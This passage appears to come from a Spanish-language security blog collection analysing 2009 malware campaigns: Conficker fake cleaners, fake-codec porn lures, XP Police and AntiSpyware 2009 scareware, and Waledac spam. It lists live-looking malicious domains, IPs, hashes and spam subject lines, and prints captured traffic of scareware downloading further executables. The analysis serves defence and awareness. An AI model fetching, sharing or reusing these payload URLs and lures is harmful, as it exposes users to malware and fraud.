Según Conficker Working Group, cada uno de los mapas fueron generados a partir de todas las infecciones de conficker producidas desde el principio de su existencia, lo que suma aproximadamente un total de 35 millones de IP's.

Si bien los mapas no expresan un número exacto de infecciones, dejan una idea clara de la distribución de infecciones que logró hasta el momento conficker y las zonas más afectadas por el mismo.

Conficker III. Campaña de propagación de falsas herramientas de limpieza

La gran repercusión que el gusano conficker tuvo a nivel mundial, hizo que no sólo los medios de comunicación se hagan eco de sus actividades, sino que también, estas mismas repercusiones son utilizadas de manera maliciosa para propagar otros tipos de códigos maliciosos.

Algunos sitios ya dieron cuenta de la existencia de páginas web que hacen referencia sobre supuestas herramientas de limpieza para conficker pero que en lugar de ello descargan algún 211 componente malicioso. Es decir, la promesa de erradicar la amenaza del equipo que prometen muchos de estos sitios es falsa. 212

Es simplemente una estrategia de engaño para propagar programas tipo scareware o, en algunos casos, troyanos.

Algunos de los dominios de este estilo son:

http://conficker-cleaner .com http://confickerc .net http://conficker .com http://confickerc .org http://conficker.co .uk http://confickercvirus .com http://confickercvirus .info http://confickercvirus .net http://confickercvirus .org http://conficker .de http://conficker .info http://conficker .net http://conficker .org http://downadup .com http://downadup.co .uk http://downadup .de http://downadup .info http://downadup .net http://downadup .org http://downadupvirus .com http://downadupworm .com http://removeconficker .net http://removeconficker .org http://stopconficker .com http://w32downadupc .com

La mayoría de las compañías antivirus han desarrollado una herramienta de limpieza específica para ayudar a combatir al gusano conficker, y algunas otras organizaciones de seguridad también poseen alternativas que ayudan a detectar la amenaza.

Cada uno de estos sitios representa un potencial peligro de infección, por lo tanto hay que evitarlas y/o filtrarlas.

Conficker IV. Dominios relacionados... y controversiales Luego de publicar Conficker III. Campaña de propagación de falsas herramientas de limpieza, tanto en este mismo blog como en el blog de evilfingers, he recibido algunos correos preguntando por qué había publicado nombres de dominios que no guardan relación alguna con lo que se expresa en el post en cuestión; es decir, con falsas herramientas de limpieza.

Sin embargo, y teniendo en cuenta esta situación, resulta necesario aclarar cómo se ha tejido una gran estrategia propagandista para "aprovechar", de manera positiva en algunos casos y negativa en otros, la gran demanda que atrajo la palabra "conficker" como consecuencia de la gran oleada de supersticiones que rondan en torno al gusano.

¿Qué quiero decir con esto?, la situación hizo que la palabra sea utilizada como campaña para atraer más visitas y más publicidad.

La cuestión es que la campaña tuvo dos vertientes bien diferenciadas. Una dada por quienes se encuentran bajo la bandera de la seguridad, donde, con la intención de generar un efecto "imán" al utilizar la palabra "conficker", algunas compañías han adquirido los dominios que en un primer momento habían sido utilizados con fines maliciosos, para redireccionar hacia la descarga de una herramienta de limpieza legítima o información relacionada para combatir la amenaza que supone el gusano. 213

Por ejemplo, http://www.remove-conficker.org redirecciona a http://www.microsoft.com/protect/computer/viruses/worms/conficker.mspx , o también http://downadup.org que ahora redirecciona a http://www.bdtools.net .

Por otro lado, quienes se encuentran constantemente pensando estrategias de engaño que permitan aumentar sus ganancias a través de diferentes acciones poco éticas, también vieron en la palabra "conficker" una oportunidad. En consecuencia, comenzaron a aparecer muchos sitios web que, bajo la promesa de ofrecer información sobre la limpieza de conficker o herramientas gratuitas, utilizan la oportunidad para ganar visitas.

La palabra "conficker" es una de las más buscadas en Internet, gracias a la campaña de propaganda global que los medios de información se encargaron de alimentar, por lo tanto, no resulta para nada extraño encontrarse con acciones de este tipo.

214

Ingeniería Social visual para la propagación de malware Los métodos de engaño forman una pieza fundamental dentro de las estrategias de diseminación de códigos maliciosos; sobre todo, del tipo troyanos ya que necesitan de la intervención del factor humano para cumplir con efectividad sus objetivos.

Si bien el empleo de Ingeniería Social visual no representa un método para nada innovador, sigue siendo altamente explotado por delincuentes informáticos con el ánimo de lograr que usuarios desprevenidos activen (con doble clic) el malware.

Teniendo en cuenta estas características, la pregunta que inmediatamente suena en la cabeza es, si no se trata de un método novedoso ¿por qué existe un alto porcentaje de infección a través de este tipo de engaños?

Quizás, una de las claves que permitan responder la pregunta sea la gran demanda de material pornográfico a través de Internet. "Cómo así" diría un amigo centroamericano :-)

Una de las características principales de la Ingeniería Social visual, radica en la explotación de sitios web que prometen contenidos multimedia, siendo la pornografía uno de los tópicos más buscado en Internet y, en consecuencia, uno de los más habituales de explotar a través de esta técnica.

Un ejemplo concreto lo representan las falsas páginas de PornTube, donde se promete visualizar un supuesto video, utilizando como carnada una imagen del supuesto video, junto a la necesidad de instalación de un códec que, claro esta, se trata de un malware y no de un códec.

215

A continuación expongo algunas de las URL's empleadas para difundir esta estrategia, pero hay que tener en cuenta que la cantidad de dominios empleados por los delincuentes que se encuentran detrás, es muchísimo más larga. watch-videos .cn 7wmv .in alll-online.com/pl/pl .php stumbulepon .com video.stumbulepon .com watch-video .info yuotnbe .com yuotuhe .com world-tube .biz hothotvideo .com video-go .net get-new.mee.fgu.name/sudofe .html sandpaper-type.mee.fgu.name/qurer .html free-avg.mee.fgu.name/qusthalyene .html

Una cuestión de oferta y demanda, quienes suelen visitar sitios pornográficos, quieren consumir pornografía. No importa que el material se presente en formato imagen o video, ni que en medio del supuesto video se solicite la instalación de diez "códec"; quien quiere pornografía hará todo lo posible por obtenerla sin medir los potenciales riesgos de seguridad que ello, muchas veces, implica.

Campaña de infección scareware a través de falso explorador de Windows Las estrategias de engaño son la principal característica que emplea el scareware para generar temor en el usuario y lograr la ejecución de su instalador. Si bien las excusas que se emplean para los engaños son muchas, algunas más llamativas que otras, cada vez se percibe más un claro aumento de los esfuerzos por idear y crear estrategias más sofisticadas.

En este caso, el engaño se encuentra focalizado en presentar un scaneo online del equipo que siempre termina encontrando problemas de infección, ofreciendo la descarga de la supuesta herramienta de seguridad que solucionará los problemas. Todo completamente falso.

216

Cuando el usuario accede por primera vez a la página maliciosa, una alerta advierte sobre la potencial posibilidad de que nuestro equipo haya sido víctima de códigos maliciosos.

En este momento se produce la simulación de un scaneo del equipo que es representado a través de un falso explorador de windows y un gif animado que muestra la barra de progreso indicando el avance del scan, para luego desplegar una ventana emergente con la nomenclatura de las supuestas amenazas encontradas en el sistema.

Esta imagen, que ofrece dos opciones ( "Remove all" y "Cancel" ) constituye otra capa del engaño, ya que sin importar en que sector de la imagen se haga clic, produce el mismo efecto: descarga el instalador del malware. Un archivo llamado install.exe cuyo MD5 es 8eed59709de00e8862d6ce3d5e19cb4a.

Algunas de las direcciones web que se encuentran activamente explotando esta actividad maliciosa son: stabilityaudit.com (209.44.126.22) websscan.com goscanbay.com (78.159.101.27) goanyscan.com goscanever.com goscanfuse.com goscanit.com goscanonly.com goscanslot.com gowayscan.com in4co.com in4ik.com megascan4.com www.goscanonly.com www.homescan4.com easywinscanner17.com (209.249.222.48) fast-antimalware-scanner.com (194.165.4.7) fastantimalwarescan.com (78.47.91.153)

217

Sin embargo, el profesionalismo que buscan sus creadores se va perfeccionando intentando cubrir la mayor cantidad de "público" posible desplegando la estrategia de infección en varios idiomas.

Incluso, descargando variantes del mismo malware. De esta manera, los creadores del scareware intentan cubrir los dos idiomas más empleados a nivel mundial como lo son el inglés y el español

Estrategia de infección agresiva de XP Police Antivirus Luego de comentar sobre la campaña de Ingeniería Social visual empleada por el scareware XP Police Antivirus, nos encontramos con un condimento extra que también intenta explotar de lleno la Ingeniería Social en las características naturales del factor humano.

El mismo dominio desde donde se descarga del binario install.exe es empleado para diseminar otro troyano, a través de una falsa página de PornTube; codec.exe (MD5: a90e8a945f5cce31db00cac14a26418c), también perteneciente a la familia de XP Police Antivirus.

A continuación podemos apreciar una captura:

Al infectar el equipo, el troyano deja accesos directos en el escritorio del usuario que hacen referencia a los siguientes sitios web que se diseminan por spam:

Cheap Pharmacy Online >> http://www.quality-rx .com/?fid=1056 Cheap Software >> http://allisoftware .com VIP Casino >> http://affiliate.goldvipclub .com/remote/SmartDownload.asp?affid=760 MP3 Download >> http://www. mp3sale .ru/?pid=507 218

SMS TRAP >> http://www.smstraper .com/go/MTEzOjA=/ Search Online >>http://www.adultwebfind .com/search .php?aid=16851&keyword=sex

Al acceder al acceso directo de VIP Casino se descarga el ejecutable SmartDownload.exe (MD5: 0f47f132f9e3d2790a6b27ffc2c502b0), y MP3 Download accede directamente al dominio http://xp-police-09 .com/lands/error/ desde donde se despliega una nueva estrategia de engaño simulando un error.

Al cabo de unos segundos, el usuario comenzará a experimentar el despliegue de ventanas emergentes con alertas sobre supuestas infecciones y solicitudes de registro del falso programa.

Similares a la que se observa en la siguiente imagen:

Sin embargo, hasta esta instancia, las acciones pueden ser vistas por la víctima, pero, en segundo plano siguen sucediendo otras acciones que involucran directamente la descarga de los componentes del scareware XP Police Antivirus.

219

Estrategia de infección agresiva de XP Police Antivirus. Segunda parte Desde el momento que se produce la infección de XP Police Antivirus, el usuario comenzará a visualizar en pantalla una serie de ventanas emergentes de alertas sobre falsas infecciones, entre otras.

Pero de manera completamente transparente, se van produciendo una serie de acciones tendientes a completar la obra del scareware.

A través de la escucha del tráfico, vemos la descarga de los siguientes componentes:

GET /setupc.dat HTTP/1.1 User-Agent: MS_Update32 Host: setupdatdownload.com

Descarga setup.dat que no es un archivo de datos sino que es un archivo comprimido que guarda una copia de los otros archivos que se descomprimen en C:\Archivos de programa\XPPoliceAntivirus.

GET /sysupdate.exe HTTP/1.1 User-Agent: MS_Update32 Host: setupdatdownload.com

Descarga sysupdate.exe (MD5: 36e13b0624dbd4bc973d1fd5f949ebe0) es utilizado para comprimir el malware en tiempo de ejecución para intentar evitar su detección por parte de programas antivirus.

GET /svchost32.exe HTTP/1.1 User-Agent: MS_Update32 Host: setupdatdownload.com

HTTP/1.1 200 OK Server: nginx Date: Sat, 28 Feb 2009 12:47:46 GMT Content-Type: application/octet-stream Last-Modified: Fri, 27 Feb 2009 16:01:17 GMT Accept-Ranges: bytes Content-Length: 2746314 Connection: Keep-Alive Age: 0

MZ...... @...... !..L.!This program cannot be run in DOS mode. GET /land.txt HTTP/1.1 User-Agent: wget 3.0 Host: xp-police-09.com Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx Date: Sat, 28 Feb 2009 12:51:15 GMT Content-Type: text/plain Last-Modified: Mon, 02 Feb 2009 20:53:00 GMT ETag: "3a58001-1-bd70a300" Accept-Ranges: bytes Content-Length: 1 Connection: Keep-Alive Age: 0

2 GET /js/window.js HTTP/1.1 Accept: */* 220

Referer: http://www.xp-police-09.com/installed.php?id=108 Accept-Language: es Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: www.xp-police-09.com Connection: Keep-Alive Cookie: id=108

El JavaScript windows.js despliega en pantalla la ventana pop-up con la leyenda Thank you for Installation!

GET /buy.php?id=108 HTTP/1.1 Accept: */* Accept-Language: es Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: www.xp-police-09.com Connection: Keep-Alive Cookie: id=108

Esta es la página de compra del scareware desde donde se solicita información sensible y financiera de la víctima. Es un scam/phishing.

Las maniobras empleadas por los códigos maliciosos son cada vez más agresivas y eficaces en cuanto a sus acciones ya que, como se pudo apreciar, el instalador que se descarga en primera instancia, es sólo una parte del rompecabezas desde el cual el scareware obtiene las demás piezas.

221

Campaña de propagación de XP Police Antivirus a través de Ingeniería Social Visual Las estrategias de engaño a través de Ingeniería Social visual como lo son los casos en que se simula la visualización de videos en línea y se intenta descargar malware bajo la cobertura de la falta del códec necesario, se han transformado en moneda corriente y casi una regla que debería tener presente el usuario para escapar de una potencial infección.

En otra oportunidad les contaba cómo el scareware IE Defender empleaba una campaña similar para propagar su instalador utilizando la misma estrategia de engaño. En esta oportunidad, el turno de explotar esta técnica es para XP Police 2009.

Todos los dominios que involucran la campaña direccionan hacia http://sexybabes18 .com/video/ bajo la dirección IP 84.243.197.10 . En esta instancia se descarga un archivo binario llamado install.exe (MD5: 6ba25f5f8ed91db92305f92beef1fe84) desde el sitio web de XP Police 2009.

Al acceder a la página web del scareware, que utiliza las direcciones IPs 213.163.65.10 , 213.163.65.10 y 206.125.44.28 , podemos comprobar que el archivo que se descarga es el mismo.

Los dominios actualmente explotados por XP Police 2009:

xp-police-09 .com xp-police-antivirus .com xp-police-engine .com xp-police .com xp-police-2009 .com xp-police-av .com mail.xp-police-antivirus .com ns1.xp-police .com ns2.xp-police .com ns3.xp-police .com ns4.xp-police .com www.xp-police-09 .com www.xp-police-antivirus .com www.xp-police-av .com www.xp-police-engine .com

Esta técnica de ataque se encuentra activamente explotada por uno de los tantos scareware que existen, con lo que cabe la posibilidad de que veamos más falsos programas de seguridad empleando esta estrategia.

222

Google Grupos nuevamente utilizado para diseminar porno spam Las técnicas de spamming son cada vez más agresivas y los spammers, con tal de continuar con la industria económica que se encuentra detrás de la publicidad no solicitada, enfocan todos sus esfuerzos en buscar "alternativas" que permitan bypasear los mecanismos de autenticación implementados en los servidores webmail.

En consecuencia, en los últimos días las casillas de millones de usuarios se han visto bombardeadas por una importante cantidad de spam que bajo asuntos alusivos a videos eróticos o pornográficos de celebridades, utiliza el servicio Google Grupo para diseminar spam pornográfico.

Algunas de las frases empleadas en el asunto para captar la atención de los usuarios son:

Hey! It is Erica. Wanna date? Hi! This is Dana from last Monday video shoot. Hello! It is Norma. Couldn't reach you. Jessica Alba was caught naked in sauna! Jennifer Aniston was caught naked in sauna! Jennifer Love Hewitt's nude beach photos! Cameron Diaz's nude beach photos! Denise Richards's fitting room hidden pics! Shakira and her mystery boyfriend pics! Hi! It is Deena. Fresh teens who just got legal to pose. Hi! This is Amelia. Fresh teens who just got legal to pose.

Por otro lado, algunos de los perfiles utilizados en el servicio en cuestión son los siguientes: http://groups.google.com/group/zcmcrowderifjzub/?iqhphgbeaxegecyvaduryqmgzzv&pli=1 http://groups.google.com/group/rnushafermrlio/?xsopvgfxraihhintaudhuhgwxqqdr http://groups.google.com/group/xm388drtr876gx/web/xblsdmz http://groups.google.com/grou/giuyburroughsyqk/?oscfdntsxfsxygrimaykrdnbpiiwk http://groups.google.com/group/vlmwillistvkkyx/?mjywanyxpngnhthdsbmhwsgspozh http://groups.google.com/group/tixjotin2wtv/web/rqcc8ne http://www.google.com/group/rsnclineiqs/?fchgwoioqdxyhxzujnqhsj http://www.google.com/group/qjmjvwbrobbinsyne/?vuqkpijorysniuzmcmrcmu http://www.google.com/group/smpwthackercdi/?netcrpysqsrpnwwhddfcvxkemobiv http://groups.google.com/group/rt4q26ggg4azg/web/pvnrywa http://www.google.com/group/henvrankinosv/?mpsajqfwyzlqxqpouxokymddoos http://www.google.com/group/aediyyxfieldsljx/?imingpivvlnkyputxttpugmcwdt http://groups.google.com/group/zscsqcgzrxhxno/web/k4xkob http://www.google.com/group/oapfhxjbledsoeakpas/?lkngiiujnfqyotalcibneib http://www.google.com/group/dtoercardenasmyld/?nqhbbvfazcqwqchrgyzzgvxyu http://www.google.com/group/smpwthackercdi/?kzxgxdhqmjthzyrjmeckg http://www.google.com/group/jpfkdowneyviyxlco/?fknhxtryihnlykkddadzjhq http://www.google.com/group/ldubartlettvqv/?sjeqkrtkzhipuymmeyohncvvm http://www.google.com/group/tzqmockjapi/?ieywkhfiwklmksgjhhcnycniwmfym http://www.google.com/group/mdnsylclynnakjl/?zivtwsmexjcvvapfzejv http://www.google.com/group/thlssheetscru/?ciotibufyziphemhnqemuz http://www.google.com/group/ynatdxhjenningswmjfcap/?wkqsusarwnzbqzbtqkmgewrwihj http://www.google.com/group/eblshoemakergaouclt/?tyvkjqeixthanyzeasoty http://www.google.com/group/jyqpukinneypnyfw/?aasinzdghhknxajmprdshftcbl http://www.google.com/group/stfxzdfbegayuguh/?fpkvhcnouznregxpqrvchicwza http://groups.google.com/group/caylyjacobigyeg/web/kuytfopiufyoutd 223 http://www.google.com/group/egnjomckennalcwin/?pyjzsnomluxqcgathnbo http://www.google.com/group/qolurosadomunto/?piqzlscomokvrftqoicliroqv

La lista es realmente larga como para reflejar cada una de las direcciones en este post, sin embargo, los ejemplos son suficientes para tener una idea lo suficientemente concreta como para comprender que el spam es un problema que afecta a todos por igual y que en la actualidad constituye uno de los negocios más explotados.

Más Waledac en acción ¿Puedes adivinar cuánto te amo gano? La pregunta del título parecería ser la que nos realiza Waledac, que a través de amorosas imágenes y variadas estrategias de Ingeniería Social continúa su bombardeo malicioso de falsas postales para intentar infectar nuestros equipos.

Con una finísima ampliación de sus imágenes, este malware, que para muchos es la evolución de Nuwar, nos presenta nuevas imágenes:

Siguiendo la misma temática:

Aunque el hecho de cambiar las imágenes no deja de ser un hecho curioso que manifiesta la manera en que sus creadores emplean la Acción Psicológica , perdón, las estrategias de engaño para manipular las decisiones de los usuarios, no es tan trivial que todavía, y a pesar del ruido que viene causando en la comunidad, el índice de detección siga siendo pobre, ya que menos del 50% de los antivirus lo detecta.

Ahora bien, las acciones que realiza Waledac van un poquito más allá de lo que hasta el momento venimos viendo, ya que combina su método de ataque a través de Drive-by- Download. Es decir, en el código html encontramos incrustado la etiqueta iframe: 224

http://chatloveonline .com/tds/Sah7

Este tag redirecciona, luego de varios niveles, a un sitio de juegos en línea, desde el cual se intenta engañar nuevamente a los usuarios para que se termine descargando un binario llamado AllSlots.exe (MD5: 90ee59131ea66f1b050916da56400dee) que no es ni más ni menos, que otro código malicioso.

Waledac combina de manera inteligente su batería de instrucciones maliciosas a través de diferentes métodos de engaño de los cuales, de una forma u otra, pretende infectarnos.

Si bien actualmente la tasa de detección del malware es baja, siempre es recomendable correr un scan para prevenir potenciales infecciones o, directamente, no descargar archivos desde sitios o enlaces no confiables.

AntiSpyware 2009 amplia su oferta maliciosa y utiliza dominios .pro AntiSpyware 2009 es un conocido scareware (o rogue ) cuyas acciones características comprenden, entre otras, la saturación de la conexión a Internet y el despliegue de molestas ventanas emergentes que aluden de manera dramática a la infección de nuestro equipo, proponiendo la compra de la versión "paga" del malware a través de Internet.

Este scareware se encuentra operando desde el año 2007, cuando era conocido bajo el nombre AntiSpyware y durante el 2008 como AntiSpyware 2008 , y actualmente ha ampliado su gama de propuestas de engaño diseminando una cantidad importante de sitios web que lo alojan recurriendo, incluso, a dominios .pro (profesional).

225

Bajo la IP 74.54.156.235 , alojada en Dynapp Inc - Georgia. EEUU , se esconden los siguientes dominios:

drivers .pro internetexplorer .pro javascript.pro mediaplayer.pro fixfileextension.com 2squared.com adwarealert.com adwarebot.com antispyware.com antispywarebot.com erroreasy.com errorfix.com errorkiller.com errorsmart.com errorsrepair.com errorstool.com errorsweeper.com evidenceeraser.com macrovirus.com malwareremovalbot.com privacycontrol.com regfixpro.com registryfox.com registrysmart.com regsweep.com smitfraudfixtool.com spywarebot.com spywarestop.com updatesregistry.com paretologic.com nuker.com mykeylogger.com Activexrepair.com Aolerrors.com Audiodeviceerrors.com noadware.net 226

La mayoría de los dominios comparten diseño cambiando sólo el nombre de la falsa herramienta de seguridad u optimización.

Por último, nos encontramos con dos datos que vale la pena destacar, uno interesante y otro, más que interesante, preocupante.

El primero de ellos es que este scareware recurre también a la potencia de compresión del programa 7zip para comprimir los binarios dañinos disminuyendo así su tamaño en casi un 70%. El tamaño original del malware descargado es 2.50MB (MD5: c148174afe2e9e36e56a6ffd7fc68cb6); sin embargo, al descomprimirlo, su peso asciende a 33.3MB (MD5: 02cd088fd922197d9d5fda9890de911c).

El segunda dato interesante pero a la vez muy preocupante, es que el índice de detección de este malware es extremadamente bajo; dato que podemos apreciar a través del reporte de VT realizado sobre el binario descargado

Waledac más amoroso que nunca Como ya he comentado en anteriores post, Waledac es un gusano cuyo principal objetivo es reclutar zombies PCs y así utilizar todo el potencial distribuido para propagar más códigos maliciosos y diseminar más correo electrónico no deseado.

Hace aproximadamente un mes, este gusano había comenzado su campaña de propagación utilizando como excusa, y adelantándose, al día de los enamorados que se celebra hoy, 14 de febrero, a nivel mundial.

Ahora, parece haber guardado toda su batería de estrategias de Ingeniería Social visual para este día, renovando todo su repertorio mostrando las siguientes imágenes:

227

228

También ha cambiado el nombre de los binarios: reader.exe MD5: A9286212E0D7B46841C860FD3F058DFA valentine_card.exe loveu.exe start.exe val.exe programm.exe luv.exe luvu.exe patch.exe MD5: 1C5E4A7FCBE766133F743C9A0150373D loveexe.exe MD5: 5C17F98919D2C84C3FD1908630396BB7 mylove.exe cardviewer.exe MD5: E2F9C7A76581047D493FDE2C4A02737A

Como se desprende a través de los reportes de VT, Waledac posee actualmente un bajo nivel de detección por parte de las firmas antivirus; es decir, no sólo ha cambiado el repertorio de imágenes sino que también el código de los binarios, tornándolo aún más peligroso.

Estrategias de engaño, spam y códigos maliciosos El correo electrónico no deseado constituye el medio utilizado por los spammers para alimentar la industria fraudulenta que día a día satura la casilla de correo de cualquier usuario que posee una cuenta.

Se estima que más del 95% del correo electrónico que circula por Internet es spam. Un porcentaje realmente importante que ninguna estadística relacionada deja de lado reflejando que, evidentemente, es una pieza fundamental dentro del circulo vicioso que representa la industria del malware actual.

El spam es una parte que ayuda a cerrar el circuito fraudulento y malicioso del cual forman parte toda una maraña de programas y actividades maliciosas como las estrategias agresivas de Ingeniería Social que buscan reclutar zombies PCs a través de la diseminación de diferentes códigos maliciosos que se encargarán de continuar la cadena de propagación, no sólo del malware sino que también de más y más spam.

Cercano al festejo por el día de los enamorados (San Valentín), en los últimos días, un gran porcentaje de las estrategias de engaño para la diseminación de spam, se basa precisamente en este día.

El tema es que esta masiva diseminación de spam, sirve no sólo para emitir publicidad no solicitada sino que mucho más grave, para la propagación de malware. 229

Como es el caso de la página de casino que se muestra en la siguiente captura:

Cuando el usuario accede se intenta descargar un archivo binario llamado SmartDownload.exe que es un código malicioso.

Otra de las alternativas es, una vez que el equipo ha sido comprometido, comienza a utilizar el sistema víctima como puente para continuar la cadena de propagación de spam, como por ejemplo waledac, que al infectar el sistema comienza a propagar el siguiente spam:

O este otro, pero siempre haciendo alusión al día de San Valentín, tanto en el cuerpo como en el asunto del mensaje:

Algunos de los dominios utilizados para la propagación de este tipo de publicidad son:

Canadian Pharmacy Happy Valentine's Day smilesfinger .com tenaciouschance .com abilityrefreshing .com nicemeek .com 230 radiantglad .com wiseradiant .com smashingfantastic .com uniqueflip .com heartapproachable .com excitingtolerant .com findfoolproof .com honorableabove .com windowsilver .com enkindledtrust .com warmpeak .com droolbits .com swellspeed .com brieftangy .com sil.ebnowx .cn slzi.ebnowx .cn treatloyal .com quietjust .com excellentspeak .com reapquiet .com timelessline .com vigilantbought .com rightplump .com gda.ebmostx .cn gdw.ebmostx .cn tzt.ebmostx .cn twc.ebmostx .cn excitelucid .com spicyhardy .com clearkind .com soxj.ebnational .cn sfu.ebnational .cn deluxesugar .com winnerbegan .com dynamicstrong .com helddedicated .com weighlossforidiotssfeb .net respectgoaloriented .com silverfriendly .com leadsillustrious .com distinctiveequitable .com kwas.odcon .cn khpo.odcon .cn rtf.odconclud .cn rhct.odconclud .cn dotpufey .cn kazwebix .cn

Penis Enlarge Patch Rx xgertjoi .cn/a djxzdae .cn/a aleloi .cn/a saglikop .cn relaxawake .com ckiiiaa .cn qorfiyin .cn wezzoqoc .cn bfkchjla.yanpusbiet .net/?degimaxwvuqqybfkzvpchjl rohyogel .cn tuvb.hogrimew .cn bmd.midrizep .cn pcyxl.nazzeciv .cn wireschool .com 231 repentantfair .com gowloroj .cn

El spam constituye un problema tanto para los usuarios hogareños como para las compañías de cualquier manitud y su existencia es consecuencia de una cuestión trivial en el campo comercial como lo es la oferta y demanda.

Waledac e Ingeniería Social en San Valentín Para el malware actual, cada evento, noticia o circunstancia especial es aprovechada como método de engaño para diseminarse a sí mismo o a otros códigos maliciosos, siendo el correo electrónico no deseado uno de los vectores de ataque más empleados para este fin.

Nuestras casillas de correo muestran ejemplos concretos que describen esta situación. El día de San Valentín (o de los enamorados) es uno de ellos, y si miramos un poco el correo spam que nos inunda, notaremos que muchos hacen alguna referencia al cercano festejo.

De hecho, waledac ha comenzado su campaña de propagación con bastante anticipación diseminándose utilizando como engaño una típica imagen que hace alusión a los enamorados mediante la cual se descargaba un binario llamado love.exe que lejos de ser amoroso, infecta el equipo convirtiéndolo en un zombie.

Como componente extra, esta anterior campaña, además de descargar el malware, la página maliciosa contenía un exploit. Entre ellas se encontraron: googol-analisys .com seocom .name seocom .mobi seofon .net goog-analysis .com

Sin embargo, recientemente sus desarrolladores han migrado la imagen a otra que pretende encontrar el mismo grado de "ternura", descargando también a waledac.

232

Algunos de los nombres utilizados para el binario son: lovekit.exe mylove.exe loveprogramm.exe love.exe loveexe.exe barack.exe postcard.exe devkit.exe runme.exe you.exe onlyyou.exe youandme.exe card.exe ecard.exe val.exe install.exe

Waledac hace uso de redes Fast-Flux y algunos de los dominios utilizados para propagarlos son:

adorelyric .com adorepoem .com adoresongs .com alldatanow .com alldataworld .com bestadore .com bestlovehelp .com bestlovelong .com cantlosedata .com chatloveonline .com cherishletter .com cherishpoems .com freedoconline .com funloveonline .com goodnewsdigital .com losenowfast .com lovecentralonline.com lovelifeportal.com mingwater .com orldlovelife .com romanticsloving .com superobamaonline .com theworldpool .com topwale .com wagerpond .com whocherish .com worldlovelife .com worldtracknews .com worshiplove .com youradore .com yourdatabank .com yourgreatlove .com yourteamdoc .com

Muchos lo comparan con otros códigos maliciosos como Nuwar (también conocido como storm o gusano de la tormenta) debido a la similitud de sus estrategias de diseminación y actividades maliciosos que realiza en el equipo infectado. Sin embargo, la realidad es que waledac es un peligroso código malicioso que ha formado una de las más importantes redes botnet del momento. 233

Propagación masiva de malware en falsos códecs En alguna otra oportunidad había comentado que tanto los creadores como diseminadores de códigos maliciosos continúan haciendo uso de viejas y por demás conocidas técnicas de engaño como lo es la propagación de malware a través de falsos códecs, supuestamente necesarios para la visualización de falsos videos.

Esta conocida técnica de engaño (Ingeniería Social visual) se encuentra siendo activamente utilizada y de manera masiva para la diseminación de troyanos downloader. El nombre de los troyanos puede ser:

TubeViewer.ver.6.exe (MD5: 1E66BEFC96CBC87FE58A8167A287ADA9) TubePlayer.v.9.exe (MD5: 88427AF3D5DD4F641589AA0D2D40DB59) tubeviewerfile.exe (MD5: 64C66D519FFFD889221436E09721F403) tubeviewerfile.exe (MD5: 1F7D97194AD503A6B355DF1CEFBF001F0) tubeviewerfile.exe (MD5: 5F25C00280E0F9075E47DCB06E908B15) tubeviewerfile.exe (MD5: B120D58ACC1CE584E07C5F648A45AD01) tubeviewerfile.exe (MD5: 429E897FAE57E5EA19C81B39D3745CC6) TestCodec.v.3.127.exe (MD5: 1E2404CBAFB1E617AB0B0D3DB3EF46E3) FlashPlayer.v.exe (MD5: CD612747CF868DF8647D47DE23AED47F)

En este caso, todas las url’s desde donde se descarga el malware son páginas pornográficas, un recurso altamente explotado para intentar infectar los sistemas de los usuarios que recurren a este tipo de sitios.

digg .com/celebrity/Namitha_Nude_Video broken-tv .com/broadcast/?d=Namitha_nude tube-nonstop-videos-sluts .com/xplaymovie .php?id=20081 2009-tube-collection .com/xplay .php?id=20467 tube-sex-xxx-tube .com/xplays .php?id=1802 tube-sex-xxx-tube .com/xplay .php?id=1760 tube-sex-xxx-tube.com/xplay.php?id=1819 streamingonlinetube .com/xplaymovie .php?id=385 streamingonlinetube .com/xplaymovie .php?id=334 celebnudestars.net/index .php?q=Gay%20Group%20Sex%20Video celebnudestars .net xxxporn-tube .com/123/2/FFFFFF/3127/TestCodec/Best xxxporn-tube .com brakeextra .com uporntube-07 .com porntubenew .com tubeporn08 .com tubeporn09 .com porn-tube09 .com

Otras temáticas muy explotadas es la descarga de warez, crack, keygen, etc., donde lejos de descargar el programa deseado por el usuario, lo que se descarga es un malware. 234

Que de hecho, la mayoría de las direcciones expuestas en este post comparten la misma dirección IP junto a otros dominios registrados que hacen alusión a la descarga de software pero aún sin contenido como: opera-extra .com player-codec .biz quicktimeupdate .com shortdownload .com soft-free-updates .com spacekeys .net turboplayer .net keyengage .net mega-player .net xp-extra .com

Por lo que quizás, dentro de poco nos enteremos de una nueva oleada de propagación de malware a través de estos dominios.

Drive-by Update para propagación de malware Para nada es novedoso decir que los códigos maliciosos de la actualidad poseen capacidades cada vez má agresivas de las cuales se valen no sólo para lograr la clásica acción de infección, sino que también realizan otras actividades como la descarga, en el sistema víctima, de una batería de programas dañinos.

El Drive-by Update permite al malware establecer una conexión clandestina contra un servidor remoto en el cual, un archivo de texto plano, dirige la maniobra de propagación indicando, al responsable de la infección primaria, qué archivos (códigos maliciosos) nuevos descargar y desde dónde.

De esta manera, a partir del momento de la infección, y con todos los inconvenientes que ello conlleva, el equipo es sometido a la manipulación de un verdadero nido de códigos maliciosos que explotarán en el sistema con las más diversas actividades para las cuales esta diseñado el malware actual, convirtiendo la máquina en parte activa de una botnet o en parte de una estructura Fast-Flux; utilizándola como "puente" para realizar ataques dirigidos y distribuidos a otros objetivos.

En el siguiente caso, utilizado como ejemplo, se descargaron los siguientes códigos maliciosos a partir de la lista pre-establecida en el servidor. En el siguiente reporte de ThreatExpert se obtiene información más detallada sobre el análisis del malware. http://m.wuc8 .com/dd/1 .exe
28/39 (71.79%) http://m.wuc8 .com/dd/2 .exe
25/39 (64.11%) http://m.wuc8 .com/dd/6 .exe
24/39 (61.54%) http://m.wuc8 .com/dd/9 .exe
31/38 (81.58%)

Por lo general, estos servidores responden a granjas, o células, de diferentes volúmenes desde las cuales cada uno de los sitios alojados son copias espejos y, en consecuencia, descargan la misma cantidad y variedad de malware.

235

b.wuc7 .com d.wuc7 .com x.wuc7 .com m.d5x8 .com m.wuc8 .com w.c66f .cn w.c66k .cn

Sin embargo, en otros casos la cantidad de malware referenciado en el archivo de texto suele ser mayor al igual que la variedad entre cada uno de ellos.

